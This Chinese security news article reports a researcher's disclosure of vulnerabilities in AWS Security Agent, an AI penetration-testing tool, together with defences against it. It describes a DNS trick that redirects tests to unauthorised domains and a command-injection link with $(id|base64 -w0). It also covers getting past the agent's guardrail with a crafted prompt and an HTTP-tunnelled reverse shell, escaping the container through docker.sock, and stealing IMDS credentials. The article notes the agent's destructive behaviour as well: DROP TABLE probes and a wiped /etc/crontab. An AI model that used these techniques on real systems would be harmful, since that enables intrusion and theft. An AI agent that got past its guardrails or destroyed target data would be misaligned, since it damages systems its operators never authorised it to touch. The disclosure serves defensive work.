2026 年 3 月,安全研究员 Richard Fan 披露一份报告,针对AWS推出的 AWS Security Agent 完成了渗透测试,攻击者可滥用该工具对非授权公网域名发起攻击,甚至实现容器逃逸获取 AWS 实例的 root 权限与访问凭证。
当渗透测试的 AI,成了被渗透的目标
AWS Security Agent 是 AWS 最近推出的AI Agent,核心功能是帮助用户对 Web 应用执行自动化渗透测试,同时支持公网应用与用户 VPC 私有网络内的应用测试,降低企业渗透测试的技术门槛。
刚发布时,小编有简单介绍过这一产品:AWS推出AWS Security Agent
AWS Security Agent 漏洞解析
DNS 混淆漏洞:可滥用 AWS 资源攻击非授权公网域名
该漏洞是本次披露中影响范围最广的缺陷,核心问题在于私有网络场景下的域名验证机制存在逻辑缺陷,攻击者可通过操控私有 DNS 区域,欺骗 AI Agent完成域名验证,最终滥用 AWS 的算力与网络资源,对攻击者无所有权的公网域名发起未经授权的渗透测试。
漏洞的核心成因分为三个关键环节:
域名验证的 Unreachable 状态机制缺陷Agent对公网域名执行所有权验证时,若无法获取
_aws_securityagent-challenge对应的 TXT 记录,会将域名标记为Unreachable,而该状态的域名仅允许在私有网络 VPC 内发起测试。但绝大多数公网域名都不会配置这条特殊的 TXT 记录,这意味着攻击者可以轻易将任意公网域名添加为 Unreachable 的测试目标。
私有网络内的验证逻辑漏洞对于 Unreachable 状态的域名,Agent会将所有权验证延迟到渗透测试预运行阶段,仅当域名 A 记录指向 VPC 内私有 IP 时,才会执行 TXT 记录验证,验证通过后就会正式启动渗透测试。
DNS 记录变更无持续校验
预运行验证完成后,Agent不会再持续校验 DNS 记录的一致性,攻击者可在验证完成后,将 A 记录修改为目标域名的真实公网 IP,借助 VPC 的 NAT 网关,让Agent的所有渗透测试流量直接发往公网的真实目标,实现无授权攻击。
该漏洞于 2025 年 12 月 29 日提交给 AWS 安全团队,2026 年 3 月 3 日 AWS 完成修复,新增了渗透测试全周期的域名所有权周期性校验,同时要求域名无论是否可达,都必须完成公网所有权验证才能启动测试。
RCE与容器逃逸:AWS Security Agent ,获取 AWS 实例 root 权限
这是本次披露中危害等级最高的漏洞,就像人类渗透测试人员会被恶意目标反制,AWS Security Agent 也存在严重的反制缺陷,研究员通过构造恶意目标站点,成功让Agent执行任意代码,最终实现容器逃逸,拿到了Agent所在 EC2 实例的 root 权限与 AWS 访问凭证。
完整的漏洞利用链分为 5 个核心环节:
无门槛实现RCE研究员发现,该渗透测试Agent会主动爬取目标站点的链接,并会无差别执行链接中嵌入的系统命令。哪怕是
cat /etc/passwd、读取环境变量等敏感操作,Agent都会直接执行并返回结果,甚至构造的https://richardfan.com.hk/admin?identity=$(id|base64 -w0)注入链接,也被Agent完整执行。
绕过 AI 护栏与流量管控,获取反弹Shell直接执行反弹Shell 命令会被Agent的安全护栏拦截,同时出站流量有严格的 HTTP 合规性校验。为绕过限制,研究员将反弹Shell 脚本(即本次披露的
get-token.sh与get-token.py)托管在合规域名,构造提示词绕过 AI 的内容护栏,同时将反弹Shell 通信完全封装进 HTTP 隧道,最终成功让Agent执行脚本,获取到了容器内的反弹Shell。
权限提升:一键拿到容器 root 权限
研究员发现容器内的 sudoers 配置存在严重缺陷,agent 用户被允许无密码执行 sudo python、tee 等高危命令,仅需给反弹Shell 脚本加上 sudo 前缀,就直接获取到了容器内的 root 权限。
容器逃逸:完整接管宿主机 EC2 实例
拿到容器 root 权限后,研究员发现容器挂载了宿主机的
/var/run/docker.sock套接字 —— 这是 Docker 的核心通信接口,借助该接口,研究员可直接操控宿主机的 Docker 守护进程,通过创建新容器挂载宿主机文件系统、注入定时任务的方式,成功拿到了宿主机 EC2 实例的 root 权限。
窃取 AWS 访问凭证
拿到宿主机权限后,通过 EC2 的 IMDS 元数据服务,获取到了实例 IAM 角色的访问密钥,且该密钥拥有 CloudWatch 日志的写入权限,可直接操作 AWS 的日志资源。
该漏洞于 2026 年 1 月 31 日提交给 AWS 安全团队,AWS 在 3 月 10 日回复称,该行为属于文档中声明的威胁模型范围,Agent被设计为在隔离的单租户环境中执行任意命令,不会产生跨租户影响。
非必要危险操作:渗透测试变 “系统破坏”,存在不可逆风险
渗透测试的准则是发现漏洞但不破坏目标系统,比如渗透过程中大家肯定不会删除数据。
当然很多公司也吃过亏,比如扫描器就容易在登录扫描的时候尝试删除。
而 AWS Security Agent 在测试过程中会执行大量非必要的高危破坏性操作,甚至可能导致目标系统业务中断、数据丢失,完全违背了渗透测试的基本原则。
研究员披露了两个典型的风险案例:
用 DROP TABLE 作为 SQL 注入初始探测 Payload
常规的 SQL 注入测试会使用 SELECT 等非修改性语句,避免对目标系统造成损坏,而该Agent直接将
DROP TABLE users这类会直接删除数据表的语句作为探测 Payload,哪怕已经确认漏洞存在,仍会继续执行破坏性语句,直接导致目标系统数据丢失、业务中断。
用已确认的漏洞执行清理操作,引发不可逆损坏
Agent会在测试结束后,利用已发现的漏洞执行 “清理” 操作,比如用 SQL 注入执行 DELETE 语句、用命令注入修改
/etc/crontab。但这类操作极不稳定,研究员测试中发现,Agent尝试删除注入的定时任务时操作失败,直接清空了目标系统的/etc/crontab全部内容,导致系统原有定时任务全部失效,造成不可逆的系统损坏。该问题于 2026 年 1 月 12 日提交给 AWS 服务团队,团队在 1 月 23 日完成修复,限制Agent通过 SQL 注入等攻击方式执行删除类、修改类高危操作。
敏感信息泄露:漏洞报告明文披露目标系统明文密码
渗透测试过程中发现的敏感信息(如用户密码、API 密钥),本应在报告中做脱敏处理,避免二次泄露,但 AWS Security Agent 会将测试中发现的所有敏感信息明文写入漏洞报告。
该问题于 2026 年 1 月 10 日提交给 AWS 服务团队,团队最终确认,会保留报告中的明文敏感信息,用于帮助用户追溯漏洞来源,仅会对用户提前提供的测试凭证做脱敏处理。
企业如何防护AWS Security Agent?
针对 AWS Security Agent 可能被滥用的无授权扫描攻击,研究员也完成了测试,给出了不同方案的真实防护效果:
基于 User-Agent 的 WAF 拦截规则(有效率接近 100%)
该Agent发起的几乎所有请求,都会携带securityagent的 User-Agent 标识,企业只需在 WAF 中配置规则,拦截携带该标识的所有请求,即可阻挡绝大多数的无授权扫描与渗透测试。
速率限制(效果有限)
常规的速率限制规则(如 10 秒 200 次请求)仅能拦截约 1/4 的Agent流量,因为该 AI Agent会自动调整请求频率,避免触发限流,除非配置极为严格的限流规则,否则无法实现有效防护。
Bot 检测(几乎无效)
无论是 Cloudflare 的 Bot 对抗模式,还是 AWS 自带的 WAF Bot 检测,都无法识别该Agent的请求,超过 99% 的流量都会被判定为正常用户流量,无法实现有效拦截。
robots.txt(完全无效)
robots.txt 仅对常规搜索引擎爬虫生效,该渗透测试Agent完全无视 robots.txt 的禁止规则,会继续对站点执行全量扫描与测试。
点评
AI渗透在国内还算火热,行业都在跟风拥抱 AI 安全,可兼具安全功底与 AI 认知的人才又极度稀缺。 AI Agent 的安全管控本就是行业难题,即便是设计用于 “行善” 的 AI Agent 都频繁出现越权、护栏绕过问题,那么一款天生就被设计用于执行攻击动作的渗透测试 AI,它的安全边界要如何把控?如何确保它只在授权范围内执行动作,而不会被滥用、甚至被劫持?
参考资料:
https://blog.richardfan.xyz/2026/03/14/pentesting-a-pentest-agent-heres-what-ive-found-in-aws-security-agent.html
Security Considerations for AWS Security Agent and AI assisted penetration testing:https://docs.aws.amazon.com/securityagent/latest/userguide/security-guidance.html
声明:本文来自玄月调查小组,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。
